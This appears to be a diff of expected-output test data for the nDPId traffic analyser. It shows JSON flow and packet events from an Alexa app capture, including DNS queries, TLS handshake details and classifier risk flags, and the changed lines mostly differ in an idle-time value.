-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186884,"flow_last_seen":1490976186884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1490976186884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8flZAAEAGlzCsECrYNu8XXq9wAbvy\/\/kGAAAAAKAC\/\/\/9UAAAAgQFtAQCCAoA9odQAAAAAAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2703,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1490976187052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187052,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwqiJAAOcGxG827xderBAq2AG7r3A+ML0a8v\/5B3ASH\/6mVwAAAgQFtAEDAwY="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2705,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1490976187055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187055,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofldAAEAGl0OsECrYNu8XXq9wAbvy\/\/kHPjC9G1AQAVfwyAAA"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1490976187242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976187242,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmNAAEARM1KsECrYrBAqAeoEADUAKipZJj0BAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1490976187508,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976187508,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6w9AAEARon6sECoBrBAq2AA16gQAUSKUJj2BgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADoACwhwaXRhbmd1acASwC4AAQABAAAAOgAENu8csg=="} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187511,"flow_last_seen":1490976187511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976187511,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1490976187511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976187511,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8IbxAAEAG7nasECrYNu8cspdlAbtMyaYzAAAAAKAC\/\/8I0wAAAgQFtAQCCAoA9oePAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2739,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1490976187571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187571,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3K9AAOcGjI427xyyrBAq2AG7l2UCDLyqTMmmNHASH\/7urAAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1490976187575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187575,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoIb1AAEAG7omsECrYNu8cspdlAbtMyaY0Agy8q1AQAVc5HgAA"} -00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01712{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187511,"flow_last_seen":1490976187511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976187511,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1490976187511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976187511,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8IbxAAEAG7nasECrYNu8cspdlAbtMyaYzAAAAAKAC\/\/8I0wAAAgQFtAQCCAoA9oePAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2739,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1490976187571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187571,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3K9AAOcGjI427xyyrBAq2AG7l2UCDLyqTMmmNHASH\/7urAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1490976187575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187575,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoIb1AAEAG7omsECrYNu8cspdlAbtMyaY0Agy8q1AQAVc5HgAA"} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01712{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1490976195484,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195484,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WmRAAEARM1OsECrYrBAqATpWADUAKI0W4msBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1490976195524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976195524,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC96\/xAAEARoTmsECoBrBAq2AA1OlYAqVJ+4muBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAW8AAoDd3d3A2NkbsAQwCwABQABAAAAWAAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAABoABDRV0Y\/AQgABAAEAAAAaAAQ0VdF6wEIAAQABAAAAGgAENFXR2MBCAAEAAQAAABoABDRV0cU="} 00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195529,"flow_last_seen":1490976195529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195529,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1490976195529,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195529,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8suhAAEAGqwasECrYNFXRj6NkAbuAhDhYAAAAAKAC\/\/+BjwAAAgQFtAQCCAoA9oqwAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195529,"flow_last_seen":1490976195529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195529,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1490976195529,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195529,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8suhAAEAGqwasECrYNFXRj6NkAbuAhDhYAAAAAKAC\/\/+BjwAAAgQFtAQCCAoA9oqwAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 